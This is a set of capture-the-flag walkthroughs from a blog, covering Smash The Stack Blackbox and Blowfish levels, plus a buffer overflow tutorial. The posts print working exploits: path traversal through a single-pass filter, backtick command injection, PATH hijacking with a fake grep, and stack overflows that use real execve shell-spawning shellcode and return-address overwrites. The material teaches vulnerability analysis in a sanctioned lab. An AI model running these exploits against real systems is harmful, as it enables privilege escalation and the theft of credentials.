Blackbox Level 4 – Sanitization Side Effects

Welcome back for another level of Blackbox from Smash The Stack.  Today we will be looking at level 4.  As always, the final password will be stripped from the page and replaced with Y’s.  If you are following along in terminal, go ahead and ssh in and let’s begin.

As usual with Blackbox, the current level’s files are in the home directory so we can check them out via ls.

level4@blackbox:~$ ls -la
total 1192
drwxr-x--- 2 level4 level4 4096 Jul 9 2009 .
drwxr-xr-x 17 root root 4096 Mar 22 15:30 ..
lrwxrwxrwx 1 root root 9 Jun 17 2009 .bash_history -> /dev/null
-rw-r--r-- 1 root level4 567 Dec 29 2007 .bash_profile
-rw-r--r-- 1 root level4 1834 Dec 29 2007 .bashrc
-rw-r--r-- 1 root level5 10 Dec 29 2007 password
-rwsr-xr-x 1 level5 level5 1189214 Jan 12 2008 shared
-rw-r--r-- 1 root root 1505 Dec 29 2007 shared.cc

We see two files, the SUID executable “shared” and the provided source, “shared.cc”.  To try and understand the program, let’s go ahead and execute it:

level4@blackbox:~$ ./shared
This program allows you to read files from my shared files. See /usr/share/level5 for my shared files. Simply use the path relative to my shared files to read a file!
Example: ./shared lyrics/foreverautumn

Judging by the output, we have an idea of what the program should be doing.  In general, it will display to us the contents of a file.  However, it has to be a file located at the directory /usr/share/level5 or deeper.  Let’s check out the directory:

level4@blackbox:~$ ls /usr/share/level5
lyrics shit1 shit2 shit3 shit4 shit5
level4@blackbox:~$ ls /usr/share/level5/lyrics
foreverautumn
level4@blackbox:~$ more /usr/share/level5/shit1
shit
level4@blackbox:~$ more /usr/share/level5/lyrics/foreverautumn

LOL, I can’t find the lyrics, so google.com

Now at this point we have an idea of the directory structure and of the files.  From here, if we can move up directories using the “..” dir listing, we could potentially re-route the program to read from /home/level5/password.  Let’s see if we have full control over the relative path supplied.  When doing this, remember to try and get to a file the program would have permissions to view.

level4@blackbox:~$ ./shared lyrics/../shit1
Contents of /usr/share/level5/lyricsshit1:
Unable to open file
level4@blackbox:~$ ./shared ../level5/shit1
Contents of /usr/share/level5/level5/shit1:
Unable to open file

Well this is interesting.  From the error message, it looks like the program may be stripping “/../” out of the string we provided.  Additionally, it’s either stripping or skipping the “../” at the beginning of the string.  From here, let’s take a look at the source code file provided to see what is happening.  I’ll leave it to you to view and understand the entire file as it’s a little large to post here.  However, let’s talk about a few key points.

We see the program takes one command line argument, a string holding a relative path.  It first strips any leading / or . characters from that string.  It next uses the strreplace function (locally defined) to strip all instances of /../ from the string.  It’s important to note this function makes a single forward pass.  Afterwards, strreplace is used again to remove /./ from the string.  Finally, this “sanitized” string is appended to “/usr/share/level5/” to form the full path, which the program then opens and prints to the screen line by line.

We will attempt to exploit the way the program sanitizes user input to create a string which points to /home/level5/password.  To do this, let’s look at how strreplace works and how it’s used in the program.  Strreplace finds instances of one string inside another and replaces them with a third string.  In this program, /../ is replaced with nothing; it is simply removed.  When doing this, strreplace keeps moving forward every time it replaces part of the original string.  Because of this, if removing one /../ causes another to be created in its place, strreplace will not see the newly created one.  Additionally, the program only calls strreplace on /../ once, not until it’s no longer there (and also not after the removal of /./ which could also have the side effect of creating /../).  So, what would one of these strings look like?  Well, like we just said, we will have /../, and when it’s removed, a new /../ needs to be created.  So assuming /../ is in the middle, let’s wrap the other around, giving us “/./.././”.  Let’s see if this works in the program (the source shows it should):

level4@blackbox:~$ ./shared lyrics/./.././shit1
Contents of /usr/share/level5/lyrics/../shit1:
shit

Aha!  We’ve done it, we’ve successfully moved up a directory.  Now let’s just reapply this idea to get to the level5 password:

level4@blackbox:~$ ./shared lyrics/./../././../././../././.././home/level5/password
Contents of /usr/share/level5/lyrics/../../../../home/level5/password:
YYYYYYYYY

There we have it, the end of level 4.  I can’t stress it enough, when a change is made to a value, the value needs to be re-verified as valid.  Simply removing a character or character string from something doesn’t make it safe.  Especially not when you only check for a character set once, and allow character removal to create the exact sets you were trying to prevent.  Test to verify and verify at the end.
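The single-pass weakness can be reproduced outside the level.  The following is a minimal sketch, not the level’s actual strreplace (that source is not reproduced here): remove_once and remove_all are hypothetical names, and both simply delete a substring in place.  The first makes one forward pass and never looks back; the second restarts from the beginning until nothing is left to remove.

```c
#include <stddef.h>
#include <string.h>

/* Hypothetical stand-in for a single-pass filter: deletes every occurrence
 * of `needle` from `s` in ONE forward pass, in place. */
void remove_once(char *s, const char *needle)
{
    size_t n = strlen(needle);
    char *p = s;

    while (n > 0 && (p = strstr(p, needle)) != NULL) {
        /* Close the gap; p stays where the match began, so any text
         * before p is never rescanned. */
        memmove(p, p + n, strlen(p + n) + 1);
    }
}

/* Hypothetical stricter variant: rescans from the start of the string
 * after every deletion, until no occurrence remains. */
void remove_all(char *s, const char *needle)
{
    size_t n = strlen(needle);
    char *p;

    while (n > 0 && (p = strstr(s, needle)) != NULL)
        memmove(p, p + n, strlen(p + n) + 1);
}
```

Feeding “lyrics/./.././shit1” to remove_once with the needle “/../” leaves “lyrics/../shit1”, the same path the level printed, while remove_all leaves no /../ behind.  Even then, checking the final resolved path against the allowed directory is the sturdier design.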

Posted in BlackBox, Smash The Stack, Wargames

Blackbox Level 3 – Step Back

Today we’re going to be looking at level 3 of the Smash The Stack wargame, Blackbox.  As usual, the password will be stripped from the page and replaced with Y’s.  Now let’s move onto the game by ssh’ing into the server as level 3.

Upon arrival the first thing we should do is look for our vulnerability and any source code, if available.  A quick ls of the home directory rewards us with a level4 SUID program called proclist, as well as a readable file called proclist.cc.  Examining further we can see that proclist.cc is (most likely) the source file:

level3@blackbox:~$ more proclist.cc
#include <iostream>
#include <string>

int main(int main, char **argv)
{
    std::string command;
    std::string program;

    std::cout << "Enter the name of the program: ";
    std::cin >> program;

    for(unsigned int i = 0; i < program.length(); i++) {
        if(strchr(";^&|><", program[i]) != NULL) {
            std::cout << "Fatal error" << std::endl;
            return 1;
        }
    }

    // Execute the command to list the programs
    command = "/bin/ps |grep ";
    command += program;
    system(command.c_str());

    return 0;
}

It is always important to understand a file when looking for a vulnerability, and today provides no exception.  Analyzing the code we can see that the program does a few things.  First, it gets input from the user using cin’s >> operator and puts it into the variable “program”.  Next, it searches through the user input stored in “program”, making sure it doesn’t contain any of the characters ; ^ & | > or <.  If one of the characters is found in the input string, the program exits.  Afterwards, the program appends the input string in “program” to the end of the command string with value “/bin/ps |grep “.  Finally the entire command string is sent to a system call via a non-mutable C string provided by the c_str() function.

Thinking about the flow of the program, it seems like the system call might be where we want to make our attack.  After all, user input is put into the system call.  So, if we can use maliciously formed input, maybe we can control what the system call does.  To do this, we must note a few things.  One is that the program uses cin >> and therefore we cannot include any white-space in our input string.  Second, in Linux we can separate shell or system call commands via a semi-colon.  Third, in the Linux shell there are three quotes one can use: single quote, double quote and backtick.  Single quotes don’t resolve variables and only additional single quotes need to be escaped.  Double quotes allow for resolving variables to their values.  Lastly, backticks execute the command string inside of them.

First, let’s look at point two.  We could potentially cause multiple command execution (such as /bin/sh) if we could include a semi-colon in our user input string.  If the system call ran as system(“/bin/ps |grep ;/bin/sh”) we would get a shell.  Unfortunately, as we noted when reading through the program, semi-colons are one of the terminating characters for the program.  Thus, we must look for a different approach as this program is attempting to validate user input, good!

-Backtick Attack:

While the user input sanitization checks for a few characters, it doesn’t check for the backtick.  Observing this and knowing that the backtick causes execution of the command string within, we may be able to cause the program to run a command.  However, looking back at point one, our backtick’ed string cannot contain any spaces.  Thus, we will have to write a little shell script to do what we want.  In this case, we want to have the program get the contents of the password file for the next level and save it into a file we can read.  This is due to the fact that we won’t be able to access a shell directly (even by executing /bin/sh) since the execution is only being used as a parameter to grep and will close immediately.  However, an executed shell script can write to a file and quit.  Let’s look at the shell file we’re going to use:

level3@blackbox:/tmp/.t$ more catpass
#!/bin/sh
/bin/cat /home/level4/password > /tmp/.t/p

As stated before, the shell script runs cat on the password file for the next level and saves it to a file of our choosing.  Now let’s set up our files, don’t forget to set the correct privileges:

level3@blackbox:/tmp/.t$ chmod 755 catpass
level3@blackbox:/tmp/.t$ touch p
level3@blackbox:/tmp/.t$ chmod 777 p

Now we’re ready to run the program and provide it with our malicious string.

level3@blackbox:/tmp/.t$ /home/level3/proclist
Enter the name of the program: `./catpass`
Usage: grep [OPTION]... PATTERN [FILE]...
Try `grep --help' for more information.
level3@blackbox:/tmp/.t$ more p
YYYYYYYYY

There we have it, that is one way to do Blackbox Level 3.  Remember that backticks cause their contents to be executed.  Here the system call handed the whole command string to a shell, which ran ps and piped its results to grep.  Before running grep, the shell expanded the backticks, which executed our script and ripped the password.  The script printed nothing, so grep was left without a pattern, printed its usage message and exited, leading to the program’s exit.  The moral of the story is to provide better user input validation and sanitization.  Additionally, it’s usually a bad idea to directly make a system call on data which is under the control of users.
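To make the “better validation” point concrete, here is a minimal sketch in C.  passes_denylist mirrors the character check from proclist.cc shown earlier; passes_allowlist is a hypothetical alternative (not part of the level) that accepts only letters, digits, underscores and dots, so anything unexpected is rejected by default.

```c
#include <ctype.h>
#include <string.h>

/* Mirrors the denylist loop in proclist.cc: reject only ; ^ & | > < */
int passes_denylist(const char *s)
{
    for (; *s != '\0'; s++) {
        if (strchr(";^&|><", *s) != NULL)
            return 0;
    }
    return 1;
}

/* Hypothetical stricter check: accept only letters, digits, '_' and '.'.
 * An empty string is rejected as well. */
int passes_allowlist(const char *s)
{
    if (*s == '\0')
        return 0;
    for (; *s != '\0'; s++) {
        unsigned char c = (unsigned char)*s;
        if (!isalnum(c) && c != '_' && c != '.')
            return 0;
    }
    return 1;
}
```

The backtick string used above passes the denylist but fails the allowlist, while an ordinary program name such as sshd passes both.  An allowlist alone still leaves the unquoted shell command in place, so it is a mitigation rather than a full fix.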

-Path Attack:

In most, if not all, modern day operating systems there exists something called the path.  The path is a list of directories in which the operating system will look for programs with the same name of programs run by the user (when the user doesn’t provide a full path to the file).  In the program which we are exploiting today, there exists a vulnerability based on this PATH variable.

In our program when the system call is executed, two commands are run by default.  The first is /bin/ps.  This command is provided as a full path and thus cannot be easily re-directed.  The second command however, is simply grep.  Since a full, or relative, path wasn’t provided for the file, the system will search the directories listed in the PATH environmental variable for a file with the same name.  If we can rewrite the PATH, we can cause the system call to execute a program called grep from a directory of our choosing.  Using this we can put our password-acquiring shell script in our chosen directory with the name grep, and watch it be executed.  Let’s go ahead and set up our files, similar to the backtick attack above:

level3@blackbox:/tmp/.t$ more grep
#!/bin/sh
/bin/cat /home/level4/password > /tmp/.t/p
level3@blackbox:/tmp/.t$ chmod 755 grep
level3@blackbox:/tmp/.t$ touch p
level3@blackbox:/tmp/.t$ chmod 777 p

Now let’s re-write the PATH to be set to the current directory, where our fake grep program is:

level3@blackbox:/tmp/.t$ export PATH=./

Finally we can run the program and see what happens:

level3@blackbox:/tmp/.t$ /home/level3/proclist
Enter the name of the program: a
level3@blackbox:/tmp/.t$ /bin/cat p
YYYYYYYYY

There we have it again, Blackbox Level 3 through PATH exploitation.  Remember, if you don’t provide a full path to a program, the operating system will look for it in your PATH, something under the control of the user.
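One way a privileged program can defend against this is to stop trusting the inherited PATH.  The sketch below is an assumption-laden illustration, not something the level does: reset_path is a hypothetical helper, and the directory list “/bin:/usr/bin” assumes that is where the system’s real grep lives.

```c
#include <stdlib.h>

/* Hypothetical helper: pin PATH to fixed system directories before any
 * call that lets the shell resolve a bare command name such as "grep".
 * Returns 0 on success, -1 on failure (as setenv does). */
int reset_path(void)
{
    return setenv("PATH", "/bin:/usr/bin", 1);   /* 1 = overwrite existing value */
}
```

Calling reset_path() before system() would make our fake grep in /tmp/.t unreachable.  Spelling out the full path to grep in the command string, as was done for /bin/ps, closes the same hole.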

Posted in BlackBox, Smash The Stack, Wargames

Blowfish Level4 – Simplest of simple buffer overflows

Welcome back for another installment from our Blowfish wargaming series, here at Technolution.  Of course, Blowfish is brought to you by the wonderful folks over at Smash The Stack.  Today we will be looking at level4.  Everyone should have the level4 pass from the previous level and should be able to ssh into the server.  Go ahead and ssh in, and let’s get started.

Once there we should remember that on Blowfish, the binaries we’ll be exploiting are in the /levels directory.  Upon getting a listing of that directory we see two useful files, level4.c and the level4 SUID binary.  Let’s read the source file to see what we’re working with:

level4@blowfish:/levels$ more level4.c
#include <stdio.h>

int main(int argc, char * argv[]) {

    char buf[256];

    if(argc == 1) {
        printf("Usage: %s input\n", argv[0]);
        exit(0);
    }

    strcpy(buf,argv[1]);
    printf("%s", buf);

}

Interesting.  From looking at the source file we see unsafe use of strcpy.  With this implementation, we can overflow buf if we can control argv[1].  Luckily, argv[1] is the first command line argument passed to the program, which is something we can easily control!  Looking at the size of buf we know we’ll need more than 256 bytes.  So let’s attempt a few runs of the program in gdb to see how many bytes we need to fill before we can overwrite the return address on the stack!

level4@blowfish:/levels$ gdb level4
(gdb) run `perl -e 'print "A"x280,"BBBB"'`
Starting program: /levels/level4 `perl -e 'print "A"x280,"BBBB"'`

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()

(gdb) run `perl -e 'print "A"x275,"BBBB"'`

The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /levels/level4 `perl -e 'print "A"x275,"BBBB"'`

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) run `perl -e 'print "A"x270,"BBBB"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /levels/level4 `perl -e 'print "A"x270,"BBBB"'`

Program received signal SIGSEGV, Segmentation fault.
0x42424141 in ?? ()
(gdb) run `perl -e 'print "A"x268,"BBBB"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /levels/level4 `perl -e 'print "A"x268,"BBBB"'`

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()

There we have it, 268 bytes until we’re positioned to overwrite the return address and take control of the flow of execution.  Next we need to place shellcode in memory.  We’ll be placing our shellcode in an environmental variable called SHELLCODE.  Let’s look at the command to do this:

level4@blowfish:/levels$ export SHELLCODE=$'\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x31\xdb\x89\xd8\xb0\x17\xcd\x80\x31\xdb\x89\xd8\xb0\x2e\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80'

Now that our shellcode is in memory, we need to get its starting memory address.  We will use a C program that takes the name of an environmental variable as an argument and prints its starting memory location.  This program is as follows:

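#include <stdio.h>
#include <stdlib.h>

/* Print the address at which the named environmental variable is stored. */
int main(int argc, char *argv[])
{
    if(argc < 2)
        exit(1);
    /* %p is the portable way to print a pointer; it expects a void * */
    printf("%p\n", (void *)getenv(argv[1]));
    return 0;
}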

Let’s compile and use the above program:

level4@blowfish:/levels$ mkdir /tmp/.somedir
level4@blowfish:/levels$ vi /tmp/.somedir/getmem.c
level4@blowfish:/levels$ gcc /tmp/.somedir/getmem.c -o /tmp/.somedir/getmem
level4@blowfish:/levels$ /tmp/.somedir/getmem SHELLCODE
0xbfffd9eb

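Now that we have the starting memory location of our shellcode, we can combine it with our buffer overflow to re-route program execution.  Note that the address used below, 0xbfffd9ef, is four bytes past the reported start so that it lands inside the NOP padding, and that it is written in little-endian (reversed byte) order:

level4@blowfish:/levels$ /levels/level4 `perl -e 'print "A"x268,"\xef\xd9\xff\xbf"'`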
sh-3.2$ whoami
level5

Bam!  Level 4 is complete.  Again, a simple buffer overflow.  Nowadays, we have to specifically compile programs to be vulnerable to this type of attack.  However, the safety mechanisms implemented don’t prevent buffer overflows; they simply try to catch and respond to overflows without losing control or allowing arbitrary code execution.  In future levels we may run into some of the prevention mechanisms, but for now, that’s all folks!

Posted in Blowfish, Smash The Stack, Wargames

Blackbox Level2 – Simple Overflow

Welcome back to Technolution.  Today’s blog will be about the SmashTheStack wargame, Blackbox.  We will be looking at level 2 of the wargame and as such I will assume you have the correct login credentials.  Now let’s begin by ssh’ing into blackbox as level2.

Upon arrival a quick ls -la shows a SUID level3/level2 program called getowner as well as what we will assume is its source, getowner.c.  Let’s examine getowner.c:

level2@blackbox:~$ more getowner.c
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>
#include <stdlib.h>

int main(int argc, char **argv)
{
    char *filename;
    char buf[128];

    if((filename = getenv("filename")) == NULL) {
        printf("No filename configured!\n");
        return 1;
    }

    while(*filename == '/')
        filename++;
    strcpy(buf, "/tmp/");
    strcpy(&buf[strlen(buf)], filename);

    struct stat stbuf;
    stat(buf, &stbuf);
    printf("The owner of this file is: %d\n", stbuf.st_uid);

    return 0;
}

Before we can exploit a vulnerability we must first find one, and the first step towards finding a vulnerability is to understand what the program is doing.  Looking at the source we see that there are two variables used in the program, a character pointer called filename and a character array of size 128 called buf.  After variable declaration the program gets the address of the start of an environmental variable called “filename” and assigns it to our char pointer, filename.  If no environmental variable called filename exists, the program prints “No filename configured” and exits.  At this point, we can see that we may have a way to insert code into the program by controlling the environmental variable “filename”, however we need to see what the program does with the string to see how it might be of use.  After loading the filename variable the next step of the program tests the contents of the string pointed to by filename.  If the string starts with the character “/”, filename is advanced by one.  This effectively strips any leading “/” characters from the filename string.

Next, we see the use of strcpy.  As used, strcpy copies the string provided as the 2nd parameter to contiguous memory starting at the location provided by the first parameter.  It will continue to copy memory until a NULL character is reached (hex 0x00).  Thus we see the memory for our char array buf gets the string “/tmp/” written to it, then the contents of the memory starting at the location pointed to by filename written starting after the “/tmp/”.

After strcpy, a structure is assigned for file stats, using the full file name now in buf.  Finally, printf writes to the screen the owner of the file with location stored in buf (/tmp/stringPointedToByfilename), and the program exits.

Now that we understand the program, we can analyze how it might be vulnerable to exploitation.  Understanding the call stack is important for what we are looking at here today with buffer overflows.  Hopefully we are familiar with the idea of the call stack, and that when functions are called on a computer, they need memory to be allocated for their variables, and a couple other things.  This isn’t a stack tutorial so we won’t go into general details, but let’s look at today’s example.  In our getowner program, when main is executed, we will see the following layout on the call stack:

[filename] [buf]       [other data] [sfp]     [ra]

[CCCC]     [BB…BB]     [DD…DD]      [XXXX]    [ZZZZ]

[4 bytes]  [128 bytes] [varies]     [4 bytes] [4 bytes]

This memory structure, combined with strcpy into buf, means that if we supply a string to strcpy that is longer than buf, strcpy will end up overwriting whatever sits between buf and the saved frame pointer, then the saved frame pointer, and eventually the return address.  (The space after buf holds things like other locals, saved registers and alignment padding, and its exact size depends on the compiler; main’s own argc and argv sit above the return address.)  This is a major security problem in that if the return address is overwritten with a value representing a valid memory location, any code at that location will be executed.  It’s also a quality assurance problem in that if the return address doesn’t have a valid location in it, it will cause a program crash.
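For contrast, here is a minimal sketch of what a bounded version of the same path building could look like.  build_tmp_path is a hypothetical function, not part of getowner.c; it keeps the leading-slash strip but lets snprintf enforce the size of the destination and reports when the name does not fit.

```c
#include <stddef.h>
#include <stdio.h>

/* Hypothetical bounded variant of getowner's path building.
 * Returns 0 on success, -1 if "/tmp/" + filename does not fit in buf. */
int build_tmp_path(char *buf, size_t size, const char *filename)
{
    int n;

    while (*filename == '/')      /* same leading-slash strip as the original */
        filename++;

    /* snprintf never writes more than `size` bytes and returns the length
     * the full string would have had. */
    n = snprintf(buf, size, "/tmp/%s", filename);
    if (n < 0 || (size_t)n >= size)
        return -1;                /* would have overflowed: refuse */
    return 0;
}
```

With a 128-byte buffer, a short name such as “//foo” yields “/tmp/foo”, while a string of 160 A’s is rejected instead of running past the end of the array.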

Now we know we can and want to overflow buf, so let’s think backwards.  How does buf get its data?  From filename.  Where does filename get its value?  From the environmental variable called “filename”.  So let’s create an environmental variable with the name filename and a value of a string of A’s using perl and the export command.  Let’s also test the getowner program after doing so to make sure it reads the env var:

level2@blackbox:~$ export filename=`perl -e 'print "A"x160'`
level2@blackbox:~$ ./getowner
The owner of this file is: 0
Segmentation fault

There we go.  The segmentation fault indicates we’ve most likely overwritten the return address and the program is trying to execute code at a memory address without valid executable code.  The next thing we want to do is determine how many A’s we need to stuff in filename so that we can carefully overwrite the return address.  We can examine the RA using gdb.  Let’s give it a test run:

level2@blackbox:~$ gdb getowner
GNU gdb 6.4.90-debian

(gdb) run
Starting program: /home/level2/getowner
The owner of this file is: 0

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()

The 0x41414141 at the end is our indicator that the return address, and eventually EIP, got overwritten with A’s (41 is the hex code value for ascii A).  From here we will do a quick test with the filename string length to determine how many bytes are needed until we overwrite the RA.  One could also continue using gdb to determine where the RA is and how many bytes are between the buffer and RA, but we’ll go with the less technical route today for ease of readability (and since this isn’t a gdb tutorial).

Now that we know 160 A’s overwrites the return address, let’s try with 150, and add the 32 bit string “BBBB” to the end.  This is to help determine the correct number of bytes before the return address.  Let’s try again:

level2@blackbox:~$ export filename=`perl -e 'print "A"x150,"BBBB"'`
level2@blackbox:~$ gdb getowner
GNU gdb 6.4.90-debian

(gdb) run
Starting program: /home/level2/getowner
The owner of this file is: 0

Program received signal SIGSEGV, Segmentation fault.
0x00424242 in ?? ()

Excellent!  We can see with 154 total bytes, we are one byte short of completely filling up the return address.  Thus, adding one more A to our string (151 in total) will correctly position the 32 bit string “BBBB” to overwrite the return address.  Now if we replace “BBBB” with 4 hex bytes that correspond to an actual memory address, we’ll be ready to make the program go execute the code we desire.  First however, we must decide on the code we want to execute.  Then we can place it into memory, and finally, get its memory address.

To write code which will execute, we must write it in low-level op-code.  Op-code is Operating System and hardware architecture dependent.  We will refer to our op-code today as shellcode since we will be using code which spawns a shell [executes /bin/sh with the Linux system call execve(/bin/sh)].  Since today’s article is not about writing shellcode we will simply use the following 41 byte shellcode which we obtained online from Packet Storm:

"\x31\xdb\x89\xd8\xb0\x17\xcd\x80\x31\xdb\x89\xd8"
"\xb0\x2e\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68"
"\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31"
"\xd2\xb0\x0b\xcd\x80"

The easiest way to place the above code into memory would be to place it in an environmental variable.  While we could use the filename environmental variable, we can also make a new one.  So to keep things simple, let’s assign our shellcode to the environmental variable SHELLCODE:

level2@blackbox:~$ export SHELLCODE=$'\x90\x90\x90\x90\x90\x90\x90\x90\x90\x31\xdb\x89\xd8\xb0\x17\xcd\x80\x31\xdb\x89\xd8\xb0\x2e\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80'

One thing to note about the above shellcode is that we added the hex value \x90 to the beginning a few times.  \x90 is the op-code instruction for No-Operation (or NOP).  No-op’s don’t perform any operation during the CPU cycle and simply forward to the next instruction.  This no-op padding is used so if our program switches execution to the memory location of any of the NOPs, we will be fast forwarded to our shellcode.

Now that our shellcode is loaded into memory, we need to find out where in memory it resides.  To do this we will use a quick C program that takes as input one string, the name of an environmental variable.  The program then prints the address in memory where the environmental variable is stored.  Let’s look at the program:

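#include <stdio.h>
#include <stdlib.h>

/* Print the address at which the named environmental variable is stored. */
int main(int argc, char *argv[])
{
    if(argc < 2)
        exit(1);
    /* %p is the portable way to print a pointer; it expects a void * */
    printf("%p\n", (void *)getenv(argv[1]));
    return 0;
}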

Now let’s compile our program and use it to find the memory location of the environmental variable SHELLCODE:

level2@blackbox:/tmp/.somedir$ gcc getmem.c -o getmem
level2@blackbox:/tmp/.somedir$ ./getmem SHELLCODE
0xbfffdb78

Alright!  Now we know our shellcode begins at memory location 0xbfffdb78.  Next we should replace the “BBBB” string in the filename environmental variable with a memory address in the middle of our NOP-sled (we’ll use 0xbfffdb7f), and our exploit should be complete!  One last thing to remember is that we need to write the memory address in little-endian format, which means reverse byte order.  Let’s rewrite our filename environmental variable:

level2@blackbox:/tmp/.somedir$ export filename=`perl -e 'print "A"x151,"\x7f\xdb\xff\xbf"'`
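
The byte order in the command above can be double-checked with a small helper.  This is a minimal sketch with a hypothetical function name, build_payload, that lays out the same thing the perl one-liner prints: a run of filler A’s followed by a 32-bit address, least significant byte first.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Fill `out` with `pad` filler bytes followed by `addr` in little-endian
 * order.  `out` must have room for pad + 4 bytes.  Returns bytes written. */
size_t build_payload(unsigned char *out, size_t pad, uint32_t addr)
{
    memset(out, 'A', pad);
    out[pad + 0] = (unsigned char)(addr & 0xff);          /* lowest byte first */
    out[pad + 1] = (unsigned char)((addr >> 8) & 0xff);
    out[pad + 2] = (unsigned char)((addr >> 16) & 0xff);
    out[pad + 3] = (unsigned char)((addr >> 24) & 0xff);  /* highest byte last */
    return pad + 4;
}
```

Called with a pad of 151 and the address 0xbfffdb7f, the last four bytes come out as 7f db ff bf, matching the string in the export command.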

Now let’s see what happens when we run the vulnerable getowner program:

level2@blackbox:~$ ./getowner
The owner of this file is: 0
sh-3.1$ whoami
level3

There we have it, shell as level3.  Don’t forget to check out /home/level3/password for the level3 password.  Level2 has been an intro to buffer overflows.  While buffer overflow attacks have been common for a long time, compilers and operating systems are working on ways to combat them.  However, most of the protective measures can also be circumvented by a crafty attacker.  Due to the nature of buffer overflows, this type of vulnerability is expected to stay around for a long time.

Posted in BlackBox, Smash The Stack, Wargames

Classic Attacks – Buffer Overflow

Welcome back to Technolution.  In today’s post we’re going to be looking at a classic computer security vulnerability, the buffer overflow.  This type of vulnerability can surface in many kinds of programs and has been the vector of exploitation for many real world attacks.  Today, we will attempt to go into a medium level of detail (leaving out an in depth assembly analysis) on buffer overflows, including what causes them, how they can be exploited, and various preventative measures.  Now, let’s get started.

First off, what is a buffer overflow?  A buffer overflow is when a program attempts to place more data into a buffer than the buffer has room for.  How does this manifest?  Well, let’s pretend we have a char array in a C program to act as a buffer for user input.  An overflow could easily happen if the user enters more characters than the length of the buffer.  In this case, if there wasn’t input validation, the program would have to make the decision on what to do.  However, a computer can’t “make decisions,” all it can do is what it was programmed to do.  For a concrete example, let’s look at string copy:

char buffer[7];
char data[] = "somedata";
strcpy(buffer, data);

In the above C code, the strcpy function will write all the bytes starting from the memory location pointed to by data, up to and including the first null character (which marks the end of the string), to the memory beginning at the location pointed to by buffer.  Since buffer was declared to be 7 bytes long, the 8th byte from data and the terminating null after it will overwrite something other than the buffer array.  This can end up causing adverse program execution.

To understand how to exploit this, we must understand how memory is used.  When a function is run, memory must be allocated.  The amount of memory allocated depends on the demands of the function.  However, additional memory is allocated for a couple of pointers.  One is the saved frame pointer (sfp) and one is the return address (ra).  Ultimately, the return address is where the program returns execution to after the current function finishes.  Thus, for exploitation, if we can change the return address, we can change what code will be executed next and this is exactly the point of buffer overflows.
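
The arithmetic can be spelled out in code.  The helper below is a minimal sketch with a hypothetical name, overflow_bytes; it only counts how far a strcpy would run past the destination and performs no copy itself.

```c
#include <stddef.h>
#include <string.h>

/* Number of bytes strcpy(dst, src) would write past a dst of `cap` bytes
 * (0 if the string and its terminating '\0' fit). */
size_t overflow_bytes(size_t cap, const char *src)
{
    size_t need = strlen(src) + 1;   /* characters plus the null terminator */
    return need > cap ? need - cap : 0;
}
```

For the 7 byte buffer and the string “somedata” this gives 2: eight characters plus the terminator need nine bytes.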

Taking the 7 byte buffer above, our memory looks something like this:

 buffer   sfp    ra
[BBBBBBB][xxxx][xxxx]

Each B in the buffer is a byte representing a character, each x in sfp and ra is a hex byte of a memory address.  Now let’s look at strcpy with a different value:

#include <stdio.h>
#include <string.h>

int main()
{
    char buffer[7];
    char data[] = "aaaaaaaaaaaaaaabbbbcccc";
    strcpy(buffer, data);
}

Running the program we get a segmentation fault!  If we load up gdb we can see the program ends with a strange value in eip (the value loaded from the overwritten return address of the stack frame).

(gdb) run
Starting program: /tmp/.somedir/tst

Program received signal SIGSEGV, Segmentation fault.
0x63636363 in ?? ()
(gdb) info registers
eax 0xbfffdce9 -1073750807
ecx 0x0 0
edx 0x18 24
ebx 0xb76ff4 12021748
esp 0xbfffdd00 0xbfffdd00
ebp 0x62626262 0x62626262
esi 0x0 0
edi 0x0 0
eip 0x63636363 0x63636363
eflags 0x210246 [ PF ZF IF RF ID ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51

What does this mean?  What is 0x63?  Well if we load up an ascii chart, we can see hex value 0x63 is the ascii value “c”.  Excellent, we filled eip with “cccc,” just what we were trying to do!  We can also see that ebp (the base pointer, restored from the saved frame pointer) was overwritten with 0x62, the value for “b”.  Thus, we can assume we had the correct number of a’s overflowing the buffer and filling up a little extra space in memory between the buffer and the saved frame pointer.  (That extra space is not main’s parameters, which sit above the return address; it is most likely alignment padding or saved registers added by the compiler, here 8 bytes, hence the 8 extra a’s.)  All we have to do now is find the memory location of any arbitrary code we want to execute, and replace the “cccc” with four hex values representing the memory location of our code.  Upon completion, we will execute the program again and watch the ‘flow!

While we could potentially search through memory looking for useful code to execute, it would be more useful if we could supply the code we want to execute.  Fortunately, in many cases this is possible.  This code, referred to as shellcode, comes with a few need-to-knows.  First, shellcode is opcode.  For those unfamiliar with opcode, it is the raw machine instruction bytes (frequently read in hex) that the CPU executes.  Due to the low level nature of opcode, it is OPERATING SYSTEM and ARCHITECTURE dependent.  This means we need different opcode for each OS and for different hardware architectures.  Additionally, it’s important to remember that shellcode shouldn’t contain any NULL characters (0x00), since string functions such as strcpy stop copying at the first one.  The process of deriving shellcode is slightly involved and not the point of today’s article.  Luckily, there are many sources out there to find good shellcode.  Today we will use some Linux shellcode we found online which will run execve(/bin/sh), providing us with a new shell spawned by the program.  The shellcode is as follows:

"\x31\xdb\x89\xd8\xb0\x17\xcd\x80\x31\xdb\x89\xd8"
"\xb0\x2e\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68"
"\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31"
"\xd2\xb0\x0b\xcd\x80"

